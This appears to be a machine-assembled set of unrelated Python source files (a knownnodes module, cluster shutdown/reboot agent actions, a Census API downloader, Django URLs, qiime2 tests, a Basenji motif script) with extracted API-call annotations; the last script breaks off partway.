3800), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (3798, 3800), True, 'import matplotlib.pyplot as plt\n'), ((3910, 3919), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (3917, 3919), True, 'import matplotlib.pyplot as plt\n'), ((6151, 6260), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(pred_bbox[0], pred_bbox[1])', 'pred_bbox[2]', 'pred_bbox[3]'], {'ec': '"""r"""', 'fc': '"""none"""'}), "((pred_bbox[0], pred_bbox[1]), pred_bbox[2],\n pred_bbox[3], ec='r', fc='none')\n", (6179, 6260), False, 'import matplotlib\n'), ((6314, 6419), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(exp_bbox[0], exp_bbox[1])', 'exp_bbox[2]', 'exp_bbox[3]'], {'ec': '"""b"""', 'fc': '"""none"""'}), "((exp_bbox[0], exp_bbox[1]), exp_bbox[2],\n exp_bbox[3], ec='b', fc='none')\n", (6342, 6419), False, 'import matplotlib\n'), ((6131, 6140), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (6138, 6140), True, 'import matplotlib.pyplot as plt\n'), ((6294, 6303), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (6301, 6303), True, 'import matplotlib.pyplot as plt\n'), ((6658, 6667), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (6665, 6667), True, 'import matplotlib.pyplot as plt\n')] |
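
A quick sanity check of the IOU helper above, assuming the class is in scope; the two 2x2 boxes below overlap in exactly one cell, so the expected ratio is 1/7.

ds = JriekeBboxDataset()
print(ds.IOU([0, 0, 2, 2], [1, 1, 2, 2]))  # intersection 1, union 4 + 4 - 1 = 7 -> ~0.1429
print(ds.IOU([0, 0, 2, 2], [4, 4, 2, 2]))  # disjoint boxes -> 0.0
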
import pickle
import threading
from bmconfigparser import BMConfigParser
import state
knownNodesLock = threading.Lock()
knownNodes = {}
knownNodesTrimAmount = 2000
def saveKnownNodes(dirName = None):
if dirName is None:
dirName = state.appdata
with knownNodesLock:
with open(dirName + 'knownnodes.dat', 'wb') as output:
pickle.dump(knownNodes, output)
def increaseRating(peer):
increaseAmount = 0.1
maxRating = 1
with knownNodesLock:
for stream in knownNodes.keys():
try:
knownNodes[stream][peer]["rating"] = min(knownNodes[stream][peer]["rating"] + increaseAmount, maxRating)
except KeyError:
pass
def decreaseRating(peer):
decreaseAmount = 0.1
minRating = -1
with knownNodesLock:
for stream in knownNodes.keys():
try:
knownNodes[stream][peer]["rating"] = max(knownNodes[stream][peer]["rating"] - decreaseAmount, minRating)
except KeyError:
pass
def trimKnownNodes(recAddrStream = 1):
if len(knownNodes[recAddrStream]) < BMConfigParser().get("knownnodes", "maxnodes"):
return
with knownNodesLock:
oldestList = sorted(knownNodes[recAddrStream], key=lambda x: x['lastseen'])[:knownNodesTrimAmount]
for oldest in oldestList:
del knownNodes[recAddrStream][oldest]
| [
"bmconfigparser.BMConfigParser",
"threading.Lock",
"pickle.dump"
] | [((105, 121), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (119, 121), False, 'import threading\n'), ((360, 391), 'pickle.dump', 'pickle.dump', (['knownNodes', 'output'], {}), '(knownNodes, output)\n', (371, 391), False, 'import pickle\n'), ((1121, 1137), 'bmconfigparser.BMConfigParser', 'BMConfigParser', ([], {}), '()\n', (1135, 1137), False, 'from bmconfigparser import BMConfigParser\n')] |
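
The rating updates above amount to a clamp to the [-1, 1] range in 0.1 steps; a standalone sketch of that arithmetic, without the BMConfigParser/state dependencies, is:

def bump_rating(rating, delta, min_rating=-1.0, max_rating=1.0):
    # same clamp used by increaseRating/decreaseRating above
    return max(min_rating, min(max_rating, rating + delta))

print(bump_rating(0.95, 0.1))    # 1.0 (capped at maxRating)
print(bump_rating(-0.95, -0.1))  # -1.0 (capped at minRating)
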
# Copyright (c) 2018 DDN. All rights reserved.
# Use of this source code is governed by a MIT-style
# license that can be found in the LICENSE file.
import os
from chroma_agent.lib.shell import AgentShell
from chroma_agent.log import console_log
from chroma_agent.device_plugins.action_runner import CallbackAfterResponse
from chroma_agent.lib.pacemaker import PacemakerConfig
def ssi(runlevel):
# force a manual failover by failing a node
AgentShell.try_run(["sync"])
AgentShell.try_run(["sync"])
AgentShell.try_run(["init", runlevel])
def fail_node():
ssi("0")
def stonith(node):
p_cfg = PacemakerConfig()
    # TODO: signal the manager that a STONITH has been done so that it
# doesn't treat it as an AWOL
console_log.info("Rebooting %s per a STONITH request" % node)
p_cfg.get_node(node).fence_reboot()
def shutdown_server(halt=True, at_time="now"):
def _shutdown():
console_log.info("Initiating server shutdown per manager request")
# This will initiate a "nice" shutdown with a wall from root, etc.
AgentShell.try_run(["shutdown", "-H" if halt else "-h", at_time])
console_log.info("Terminating")
os._exit(0)
raise CallbackAfterResponse(None, _shutdown)
def reboot_server(at_time="now"):
def _reboot():
console_log.info("Initiating server reboot per manager request")
# reboot(8) just calls shutdown anyhow.
AgentShell.try_run(["shutdown", "-r", at_time])
console_log.info("Terminating")
os._exit(0)
raise CallbackAfterResponse(None, _reboot)
ACTIONS = [reboot_server, shutdown_server, fail_node, stonith]
| [
"chroma_agent.lib.shell.AgentShell.try_run",
"chroma_agent.lib.pacemaker.PacemakerConfig",
"os._exit",
"chroma_agent.log.console_log.info",
"chroma_agent.device_plugins.action_runner.CallbackAfterResponse"
] | [((453, 481), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', (["['sync']"], {}), "(['sync'])\n", (471, 481), False, 'from chroma_agent.lib.shell import AgentShell\n'), ((486, 514), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', (["['sync']"], {}), "(['sync'])\n", (504, 514), False, 'from chroma_agent.lib.shell import AgentShell\n'), ((519, 557), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', (["['init', runlevel]"], {}), "(['init', runlevel])\n", (537, 557), False, 'from chroma_agent.lib.shell import AgentShell\n'), ((623, 640), 'chroma_agent.lib.pacemaker.PacemakerConfig', 'PacemakerConfig', ([], {}), '()\n', (638, 640), False, 'from chroma_agent.lib.pacemaker import PacemakerConfig\n'), ((758, 819), 'chroma_agent.log.console_log.info', 'console_log.info', (["('Rebooting %s per a STONITH request' % node)"], {}), "('Rebooting %s per a STONITH request' % node)\n", (774, 819), False, 'from chroma_agent.log import console_log\n'), ((1227, 1265), 'chroma_agent.device_plugins.action_runner.CallbackAfterResponse', 'CallbackAfterResponse', (['None', '_shutdown'], {}), '(None, _shutdown)\n', (1248, 1265), False, 'from chroma_agent.device_plugins.action_runner import CallbackAfterResponse\n'), ((1570, 1606), 'chroma_agent.device_plugins.action_runner.CallbackAfterResponse', 'CallbackAfterResponse', (['None', '_reboot'], {}), '(None, _reboot)\n', (1591, 1606), False, 'from chroma_agent.device_plugins.action_runner import CallbackAfterResponse\n'), ((939, 1005), 'chroma_agent.log.console_log.info', 'console_log.info', (['"""Initiating server shutdown per manager request"""'], {}), "('Initiating server shutdown per manager request')\n", (955, 1005), False, 'from chroma_agent.log import console_log\n'), ((1089, 1154), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', (["['shutdown', '-H' if halt else '-h', at_time]"], {}), "(['shutdown', '-H' if halt else '-h', at_time])\n", (1107, 1154), False, 'from chroma_agent.lib.shell import AgentShell\n'), ((1164, 1195), 'chroma_agent.log.console_log.info', 'console_log.info', (['"""Terminating"""'], {}), "('Terminating')\n", (1180, 1195), False, 'from chroma_agent.log import console_log\n'), ((1204, 1215), 'os._exit', 'os._exit', (['(0)'], {}), '(0)\n', (1212, 1215), False, 'import os\n'), ((1329, 1393), 'chroma_agent.log.console_log.info', 'console_log.info', (['"""Initiating server reboot per manager request"""'], {}), "('Initiating server reboot per manager request')\n", (1345, 1393), False, 'from chroma_agent.log import console_log\n'), ((1450, 1497), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', (["['shutdown', '-r', at_time]"], {}), "(['shutdown', '-r', at_time])\n", (1468, 1497), False, 'from chroma_agent.lib.shell import AgentShell\n'), ((1507, 1538), 'chroma_agent.log.console_log.info', 'console_log.info', (['"""Terminating"""'], {}), "('Terminating')\n", (1523, 1538), False, 'from chroma_agent.log import console_log\n'), ((1547, 1558), 'os._exit', 'os._exit', (['(0)'], {}), '(0)\n', (1555, 1558), False, 'import os\n')] |
#! /usr/bin/env python
# -*- coding: utf-8 -*
"""
A base class that governs how to download and process tables from a Census API table.
"""
import os
import logging
import pathlib
from . import geotypes
from . import decorators
logger = logging.getLogger(__name__)
class BaseTableConfig(object):
"""
Configures how to download and process tables from the Census API.
"""
THIS_DIR = pathlib.Path(__file__).parent
PARENT_DIR = THIS_DIR.parent
# All available years
YEAR_LIST = [
2017,
2016,
2015,
2014,
2013,
2012,
2011,
2010,
2009
]
# All available geographies
GEOTYPE_LIST = (
"nationwide",
"regions",
"divisions",
"states",
"congressional_districts",
"state_legislative_upper_districts",
"state_legislative_lower_districts",
"counties",
"places",
"urban_areas",
"msas",
"csas",
"pumas",
"nectas",
"cnectas",
"aiannh_homelands",
"tracts",
"zctas",
"unified_school_districts",
"elementary_school_districts",
"secondary_school_districts"
)
def __init__(
self,
api_key=None,
source="acs5",
years=None,
data_dir=None,
force=False
):
"""
Configuration.
"""
# Set the inputs
self.CENSUS_API_KEY = os.getenv("CENSUS_API_KEY", api_key)
if not self.CENSUS_API_KEY:
raise NotImplementedError("Census API key required. Pass it as the first argument.")
self.source = source
self.force = force
#
# Allow custom years for data download, defaulting to most recent year
#
# If they want all the years, give it to them.
if years == "all":
self.years_to_download = self.YEAR_LIST
# If the user provides a year give them that.
elif isinstance(years, int):
self.years_to_download = [years]
# Or if they provide years as a list, give those then.
elif isinstance(years, list):
self.years_to_download = list(map(int, years))
# If they provided nothing, default to the latest year of data
elif years is None:
self.years_to_download = [max(self.YEAR_LIST), ]
# Validate the years
for year in self.years_to_download:
if year not in self.YEAR_LIST:
error_msg = ("Data only available for the years"
f"{self.YEAR_LIST[-1]}-{self.YEAR_LIST[0]}.")
raise NotImplementedError(error_msg)
# Set the data directories
if data_dir:
self.data_dir = pathlib.Path(str(data_dir))
else:
self.data_dir = self.PARENT_DIR.joinpath("data")
self.raw_data_dir = self.data_dir.joinpath("raw")
self.processed_data_dir = self.data_dir.joinpath("processed")
# Make sure they exist
if not self.data_dir.exists():
self.data_dir.mkdir()
if not self.raw_data_dir.exists():
self.raw_data_dir.mkdir()
if not self.processed_data_dir.exists():
self.processed_data_dir.mkdir()
@property
def censusreporter_url(self):
"""
Returns the URL of the Census Reporter page explaining the ACS table.
"""
return f"https://censusreporter.org/tables/{self.RAW_TABLE_NAME}/"
#
# Geotype downloaders
#
@decorators.downloader
def download_nationwide(self):
"""
Download nationwide data.
"""
return geotypes.NationwideDownloader
@decorators.downloader
def download_regions(self):
"""
Download data for all regions.
"""
return geotypes.RegionsDownloader
@decorators.downloader
def download_divisions(self):
"""
Download data for all divisions.
"""
return geotypes.DivisionsDownloader
@decorators.downloader
def download_states(self):
"""
Download data for all states.
"""
return geotypes.StatesDownloader
@decorators.downloader
def download_congressional_districts(self):
"""
Download data for all Congressional districts.
"""
return geotypes.CongressionalDistrictsDownloader
@decorators.downloader
def download_state_legislative_upper_districts(self):
"""
Download data for all Census upper legislative districts in the provided state.
"""
return geotypes.StateLegislativeUpperDistrictsDownloader
@decorators.downloader
def download_state_legislative_lower_districts(self):
"""
Download data for all Census lower legislative districts in the provided state.
"""
return geotypes.StateLegislativeLowerDistrictsDownloader
@decorators.downloader
def download_counties(self):
"""
Download data for all counties.
"""
return geotypes.CountiesDownloader
@decorators.downloader
def download_places(self):
"""
Download data for all Census designated places.
"""
return geotypes.PlacesDownloader
@decorators.downloader
def download_urban_areas(self):
"""
Download data for all urban areas
"""
return geotypes.UrbanAreasDownloader
@decorators.downloader
def download_msas(self):
"""
        Download data for Metropolitan Statistical Areas.
"""
return geotypes.MsasDownloader
@decorators.downloader
def download_csas(self):
"""
Download data for Combined Statistical Areas.
"""
return geotypes.CsasDownloader
@decorators.downloader
def download_pumas(self):
"""
Download data for Public Use Microdata Areas.
"""
return geotypes.PumasDownloader
@decorators.downloader
def download_nectas(self):
"""
Download data for New England cities and towns.
"""
return geotypes.NectasDownloader
@decorators.downloader
def download_cnectas(self):
"""
Download data for combined New England cities and towns.
"""
return geotypes.CnectasDownloader
@decorators.downloader
def download_aiannh_homelands(self):
"""
Download data for American Indian home lands.
"""
return geotypes.AiannhHomelandsDownloader
@decorators.downloader
def download_tracts(self):
"""
Download data for all Census tracts in the provided state.
"""
return geotypes.TractsDownloader
@decorators.downloader
def download_zctas(self):
"""
Download data for Zip Code Tabulation Areas
"""
return geotypes.ZctasDownloader
@decorators.downloader
def download_unified_school_districts(self):
"""
Download data for unified school districts.
"""
return geotypes.UnifiedSchoolDistrictsDownloader
@decorators.downloader
def download_elementary_school_districts(self):
"""
Download data for elementary school districts.
"""
return geotypes.ElementarySchoolDistrictsDownloader
@decorators.downloader
def download_secondary_school_districts(self):
"""
Download data for secondary school districts.
"""
return geotypes.SecondarySchoolDistrictsDownloader
def download_everything(self):
"""
Download 'em all.
"""
for geo in self.GEOTYPE_LIST:
print(geo)
# Get the downloader function
dl = getattr(self, f"download_{geo}", None)
# Validate it
if not dl or not callable(dl):
raise NotImplementedError(f"Invalid geography type: {geo}")
# Run it
try:
dl()
except NotImplementedError:
pass
| [
"logging.getLogger",
"os.getenv",
"pathlib.Path"
] | [((237, 264), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (254, 264), False, 'import logging\n'), ((400, 422), 'pathlib.Path', 'pathlib.Path', (['__file__'], {}), '(__file__)\n', (412, 422), False, 'import pathlib\n'), ((1474, 1510), 'os.getenv', 'os.getenv', (['"""CENSUS_API_KEY"""', 'api_key'], {}), "('CENSUS_API_KEY', api_key)\n", (1483, 1510), False, 'import os\n')] |
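
A hypothetical subclass sketch showing how this configuration class is typically specialized. The class name, the table id "B01001", and the placeholder key are illustrative only; an actual download additionally needs a valid Census API key and the package's geotypes/decorators modules to be importable.

class ExampleTableConfig(BaseTableConfig):
    RAW_TABLE_NAME = "B01001"   # hypothetical ACS table id for illustration

config = ExampleTableConfig(api_key="your-key-here", years=2017, data_dir="/tmp/census-example")
print(config.years_to_download)   # [2017]
print(config.censusreporter_url)  # https://censusreporter.org/tables/B01001/
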
from django.conf.urls import include, url
from . import views
urlpatterns = [
url(r'^settings$', views.household_dashboard, name='household_dashboard'),
url(r'^myinfo$', views.my_info, name='my_info'),
url(r'^profile$', views.household_profile, name='maintain_household'),
url(r'^members$', views.household_members, name='maintain_members'),
url(r'^vehicles$', views.household_vehicles, name='maintain_vehicles'),
url(r'^ajax/models-by-make/(?P<make_id>\d+)/$', views.ajax_models_by_make),
url(r'^ajax/makes-by-type/(?P<type_id>\d+)/$', views.ajax_makes_by_type),
url(r'^ajax/add-make/(?P<type_key>\d+)/(?P<make>[\w ]{1,50})/$', views.ajax_add_make),
url(r'^ajax/add-model/(?P<make_key>\d+)/(?P<model>[\w -]{1,128})/$', views.ajax_add_model),
url(r'^ajax/delete-invite/$', views.ajax_delete_invite),
url(r'^ajax/change-member-status/$', views.ajax_change_member_status),
]
| [
"django.conf.urls.url"
] | [((83, 155), 'django.conf.urls.url', 'url', (['"""^settings$"""', 'views.household_dashboard'], {'name': '"""household_dashboard"""'}), "('^settings$', views.household_dashboard, name='household_dashboard')\n", (86, 155), False, 'from django.conf.urls import include, url\n'), ((162, 208), 'django.conf.urls.url', 'url', (['"""^myinfo$"""', 'views.my_info'], {'name': '"""my_info"""'}), "('^myinfo$', views.my_info, name='my_info')\n", (165, 208), False, 'from django.conf.urls import include, url\n'), ((215, 283), 'django.conf.urls.url', 'url', (['"""^profile$"""', 'views.household_profile'], {'name': '"""maintain_household"""'}), "('^profile$', views.household_profile, name='maintain_household')\n", (218, 283), False, 'from django.conf.urls import include, url\n'), ((290, 356), 'django.conf.urls.url', 'url', (['"""^members$"""', 'views.household_members'], {'name': '"""maintain_members"""'}), "('^members$', views.household_members, name='maintain_members')\n", (293, 356), False, 'from django.conf.urls import include, url\n'), ((363, 432), 'django.conf.urls.url', 'url', (['"""^vehicles$"""', 'views.household_vehicles'], {'name': '"""maintain_vehicles"""'}), "('^vehicles$', views.household_vehicles, name='maintain_vehicles')\n", (366, 432), False, 'from django.conf.urls import include, url\n'), ((439, 513), 'django.conf.urls.url', 'url', (['"""^ajax/models-by-make/(?P<make_id>\\\\d+)/$"""', 'views.ajax_models_by_make'], {}), "('^ajax/models-by-make/(?P<make_id>\\\\d+)/$', views.ajax_models_by_make)\n", (442, 513), False, 'from django.conf.urls import include, url\n'), ((519, 591), 'django.conf.urls.url', 'url', (['"""^ajax/makes-by-type/(?P<type_id>\\\\d+)/$"""', 'views.ajax_makes_by_type'], {}), "('^ajax/makes-by-type/(?P<type_id>\\\\d+)/$', views.ajax_makes_by_type)\n", (522, 591), False, 'from django.conf.urls import include, url\n'), ((597, 688), 'django.conf.urls.url', 'url', (['"""^ajax/add-make/(?P<type_key>\\\\d+)/(?P<make>[\\\\w ]{1,50})/$"""', 'views.ajax_add_make'], {}), "('^ajax/add-make/(?P<type_key>\\\\d+)/(?P<make>[\\\\w ]{1,50})/$', views.\n ajax_add_make)\n", (600, 688), False, 'from django.conf.urls import include, url\n'), ((688, 784), 'django.conf.urls.url', 'url', (['"""^ajax/add-model/(?P<make_key>\\\\d+)/(?P<model>[\\\\w -]{1,128})/$"""', 'views.ajax_add_model'], {}), "('^ajax/add-model/(?P<make_key>\\\\d+)/(?P<model>[\\\\w -]{1,128})/$', views\n .ajax_add_model)\n", (691, 784), False, 'from django.conf.urls import include, url\n'), ((784, 838), 'django.conf.urls.url', 'url', (['"""^ajax/delete-invite/$"""', 'views.ajax_delete_invite'], {}), "('^ajax/delete-invite/$', views.ajax_delete_invite)\n", (787, 838), False, 'from django.conf.urls import include, url\n'), ((845, 913), 'django.conf.urls.url', 'url', (['"""^ajax/change-member-status/$"""', 'views.ajax_change_member_status'], {}), "('^ajax/change-member-status/$', views.ajax_change_member_status)\n", (848, 913), False, 'from django.conf.urls import include, url\n')] |
# ----------------------------------------------------------------------------
# Copyright (c) 2016-2018, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
from unittest import TestCase, main
import qiime2
import os
from q2_qemistree import MGFDirFmt, SiriusDirFmt, ZodiacDirFmt, OutputDirs
from q2_qemistree import (compute_fragmentation_trees,
rerank_molecular_formulas,
predict_fingerprints)
from q2_qemistree._fingerprint import artifactory
class FingerprintTests(TestCase):
def setUp(self):
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
self.badsirpath = os.path.join(THIS_DIR, 'data/foo/bin')
self.goodsirpath = os.path.join(THIS_DIR, 'data/'
'sirius-linux64-headless-4.0.1/bin')
# MassSpectrometryFeatures
self.ions = qiime2.Artifact.load(os.path.join(THIS_DIR,
'data/sirius.mgf.qza'))
# SiriusFolder
self.sirout = qiime2.Artifact.load(os.path.join(THIS_DIR,
'data/sirFolder.qza'))
# ZodiacFolder
self.zodout = qiime2.Artifact.load(os.path.join(THIS_DIR,
'data/zodFolder.qza'))
def test_artifactory(self):
# everything is working fine
obs = os.environ.get('_JAVA_OPTIONS', '')
res = artifactory(self.goodsirpath, ['--help'],
constructor=OutputDirs, java_flags='-Xms2G')
self.assertEqual(obs, os.environ.get('_JAVA_OPTIONS'))
self.assertTrue(isinstance(res, OutputDirs))
# exceptions are raised
with self.assertRaises(OSError):
res = artifactory(self.badsirpath, ['--help'],
constructor=OutputDirs)
def test_fragmentation_trees(self):
ions = self.ions.view(MGFDirFmt)
result = compute_fragmentation_trees(sirius_path=self.goodsirpath,
features=ions,
ppm_max=15, profile='orbitrap')
contents = os.listdir(result.get_path())
self.assertTrue(('version.txt' in contents))
def test_fragmentation_trees_negative_ionization(self):
ions = self.ions.view(MGFDirFmt)
result = compute_fragmentation_trees(sirius_path=self.goodsirpath,
features=ions,
ppm_max=15, profile='orbitrap',
ionization_mode='negative')
contents = os.listdir(result.get_path())
self.assertTrue(('version.txt' in contents))
def test_fragmentation_trees_exception(self):
ions = self.ions.view(MGFDirFmt)
with self.assertRaises(ValueError):
compute_fragmentation_trees(sirius_path=self.goodsirpath,
features=ions,
ppm_max=15,
profile='orbitrap',
ionization_mode='n3gativ3')
def test_reranking(self):
ions = self.ions.view(MGFDirFmt)
sirout = self.sirout.view(SiriusDirFmt)
result = rerank_molecular_formulas(sirius_path=self.goodsirpath,
fragmentation_trees=sirout,
features=ions)
contents = os.listdir(result.get_path())
self.assertTrue(('zodiac_summary.csv' in contents))
def test_fingerid(self):
zodout = self.zodout.view(ZodiacDirFmt)
result = predict_fingerprints(sirius_path=self.goodsirpath,
molecular_formulas=zodout, ppm_max=15)
contents = os.listdir(result.get_path())
self.assertTrue(('summary_csi_fingerid.csv' in contents))
if __name__ == '__main__':
main()
| [
"q2_qemistree.rerank_molecular_formulas",
"os.path.join",
"os.environ.get",
"q2_qemistree.predict_fingerprints",
"q2_qemistree.compute_fragmentation_trees",
"unittest.main",
"q2_qemistree._fingerprint.artifactory",
"os.path.abspath"
] | [((4200, 4206), 'unittest.main', 'main', ([], {}), '()\n', (4204, 4206), False, 'from unittest import TestCase, main\n'), ((836, 874), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""data/foo/bin"""'], {}), "(THIS_DIR, 'data/foo/bin')\n", (848, 874), False, 'import os\n'), ((902, 966), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""data/sirius-linux64-headless-4.0.1/bin"""'], {}), "(THIS_DIR, 'data/sirius-linux64-headless-4.0.1/bin')\n", (914, 966), False, 'import os\n'), ((1607, 1642), 'os.environ.get', 'os.environ.get', (['"""_JAVA_OPTIONS"""', '""""""'], {}), "('_JAVA_OPTIONS', '')\n", (1621, 1642), False, 'import os\n'), ((1657, 1747), 'q2_qemistree._fingerprint.artifactory', 'artifactory', (['self.goodsirpath', "['--help']"], {'constructor': 'OutputDirs', 'java_flags': '"""-Xms2G"""'}), "(self.goodsirpath, ['--help'], constructor=OutputDirs,\n java_flags='-Xms2G')\n", (1668, 1747), False, 'from q2_qemistree._fingerprint import artifactory\n'), ((2171, 2279), 'q2_qemistree.compute_fragmentation_trees', 'compute_fragmentation_trees', ([], {'sirius_path': 'self.goodsirpath', 'features': 'ions', 'ppm_max': '(15)', 'profile': '"""orbitrap"""'}), "(sirius_path=self.goodsirpath, features=ions,\n ppm_max=15, profile='orbitrap')\n", (2198, 2279), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\n'), ((2587, 2723), 'q2_qemistree.compute_fragmentation_trees', 'compute_fragmentation_trees', ([], {'sirius_path': 'self.goodsirpath', 'features': 'ions', 'ppm_max': '(15)', 'profile': '"""orbitrap"""', 'ionization_mode': '"""negative"""'}), "(sirius_path=self.goodsirpath, features=ions,\n ppm_max=15, profile='orbitrap', ionization_mode='negative')\n", (2614, 2723), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\n'), ((3535, 3638), 'q2_qemistree.rerank_molecular_formulas', 'rerank_molecular_formulas', ([], {'sirius_path': 'self.goodsirpath', 'fragmentation_trees': 'sirout', 'features': 'ions'}), '(sirius_path=self.goodsirpath, fragmentation_trees\n =sirout, features=ions)\n', (3560, 3638), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\n'), ((3924, 4018), 'q2_qemistree.predict_fingerprints', 'predict_fingerprints', ([], {'sirius_path': 'self.goodsirpath', 'molecular_formulas': 'zodout', 'ppm_max': '(15)'}), '(sirius_path=self.goodsirpath, molecular_formulas=\n zodout, ppm_max=15)\n', (3944, 4018), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\n'), ((783, 808), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (798, 808), False, 'import os\n'), ((1086, 1131), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""data/sirius.mgf.qza"""'], {}), "(THIS_DIR, 'data/sirius.mgf.qza')\n", (1098, 1131), False, 'import os\n'), ((1253, 1297), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""data/sirFolder.qza"""'], {}), "(THIS_DIR, 'data/sirFolder.qza')\n", (1265, 1297), False, 'import os\n'), ((1421, 1465), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""data/zodFolder.qza"""'], {}), "(THIS_DIR, 'data/zodFolder.qza')\n", (1433, 1465), False, 'import os\n'), ((1800, 1831), 'os.environ.get', 'os.environ.get', (['"""_JAVA_OPTIONS"""'], {}), "('_JAVA_OPTIONS')\n", (1814, 1831), False, 'import os\n'), ((1977, 2041), 'q2_qemistree._fingerprint.artifactory', 'artifactory', (['self.badsirpath', "['--help']"], {'constructor': 'OutputDirs'}), 
"(self.badsirpath, ['--help'], constructor=OutputDirs)\n", (1988, 2041), False, 'from q2_qemistree._fingerprint import artifactory\n'), ((3105, 3241), 'q2_qemistree.compute_fragmentation_trees', 'compute_fragmentation_trees', ([], {'sirius_path': 'self.goodsirpath', 'features': 'ions', 'ppm_max': '(15)', 'profile': '"""orbitrap"""', 'ionization_mode': '"""n3gativ3"""'}), "(sirius_path=self.goodsirpath, features=ions,\n ppm_max=15, profile='orbitrap', ionization_mode='n3gativ3')\n", (3132, 3241), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\n')] |
#!/usr/bin/env python
# Copyright 2017 Calico LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =========================================================================
from __future__ import print_function
from optparse import OptionParser
import copy, os, pdb, random, shutil, subprocess, time
import h5py
import matplotlib
matplotlib.use('PDF')
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from scipy.stats import spearmanr
import seaborn as sns
from sklearn import preprocessing
import tensorflow as tf
import basenji
'''
basenji_motifs.py
Collect statistics and make plots to explore the first convolution layer
of the given model using the given sequences.
'''
weblogo_opts = '-X NO -Y NO --errorbars NO --fineprint ""'
weblogo_opts += ' -C "#CB2026" A A'
weblogo_opts += ' -C "#34459C" C C'
weblogo_opts += ' -C "#FBB116" G G'
weblogo_opts += ' -C "#0C8040" T T'
################################################################################
# main
################################################################################
def main():
usage = 'usage: %prog [options] <params_file> <model_file> <data_file>'
parser = OptionParser(usage)
parser.add_option(
'-a',
dest='act_t',
default=0.5,
type='float',
help=
'Activation threshold (as proportion of max) to consider for PWM [Default: %default]'
)
parser.add_option(
'-d',
dest='model_hdf5_file',
default=None,
help='Pre-computed model output as HDF5.')
parser.add_option('-o', dest='out_dir', default='.')
parser.add_option(
'-m',
dest='meme_db',
default='%s/data/motifs/Homo_sapiens.meme' % os.environ['BASENJIDIR'],
help='MEME database used to annotate motifs')
parser.add_option(
'-p',
dest='plot_heats',
default=False,
action='store_true',
help=
'Plot heat maps describing filter activations in the test sequences [Default: %default]'
)
parser.add_option(
'-s',
dest='sample',
default=None,
type='int',
help='Sample sequences from the test set [Default:%default]')
parser.add_option(
'-t',
dest='trim_filters',
default=False,
action='store_true',
help='Trim uninformative positions off the filter ends [Default: %default]'
)
(options, args) = parser.parse_args()
if len(args) != 3:
parser.error(
'Must provide Basenji parameters and model files and test data in HDF5'
' format.'
)
else:
params_file = args[0]
model_file = args[1]
data_file = args[2]
if not os.path.isdir(options.out_dir):
os.mkdir(options.out_dir)
#################################################################
# load data
data_open = h5py.File(data_file)
test_seqs1 = data_open['test_in']
test_targets = data_open['test_out']
try:
target_names = list(data_open['target_labels'])
except KeyError:
target_names = ['t%d' % ti for ti in range(test_targets.shape[1])]
if options.sample is not None:
# choose sampled indexes
sample_i = sorted(random.sample(range(test_seqs1.shape[0]), options.sample))
# filter
test_seqs1 = test_seqs1[sample_i]
test_targets = test_targets[sample_i]
# convert to letters
test_seqs = basenji.dna_io.hot1_dna(test_seqs1)
#################################################################
# model parameters and placeholders
job = basenji.dna_io.read_job_params(params_file)
job['seq_length'] = test_seqs1.shape[1]
job['seq_depth'] = test_seqs1.shape[2]
job['num_targets'] = test_targets.shape[2]
job['target_pool'] = int(np.array(data_open.get('pool_width', 1)))
t0 = time.time()
dr = basenji.seqnn.SeqNN()
dr.build(job)
print('Model building time %ds' % (time.time() - t0))
# adjust for fourier
job['fourier'] = 'train_out_imag' in data_open
if job['fourier']:
test_targets_imag = data_open['test_out_imag']
if options.valid:
test_targets_imag = data_open['valid_out_imag']
#################################################################
# predict
# initialize batcher
if job['fourier']:
batcher_test = basenji.batcher.BatcherF(
test_seqs1,
test_targets,
test_targets_imag,
batch_size=dr.batch_size,
pool_width=job['target_pool'])
else:
batcher_test = basenji.batcher.Batcher(
test_seqs1,
test_targets,
batch_size=dr.batch_size,
pool_width=job['target_pool'])
# initialize saver
saver = tf.train.Saver()
with tf.Session() as sess:
# load variables into session
saver.restore(sess, model_file)
# get weights
filter_weights = sess.run(dr.filter_weights[0])
filter_weights = np.transpose(np.squeeze(filter_weights), [2, 1, 0])
print(filter_weights.shape)
# test
t0 = time.time()
layer_filter_outs, _ = dr.hidden(sess, batcher_test, layers=[0])
filter_outs = layer_filter_outs[0]
print(filter_outs.shape)
# store useful variables
num_filters = filter_weights.shape[0]
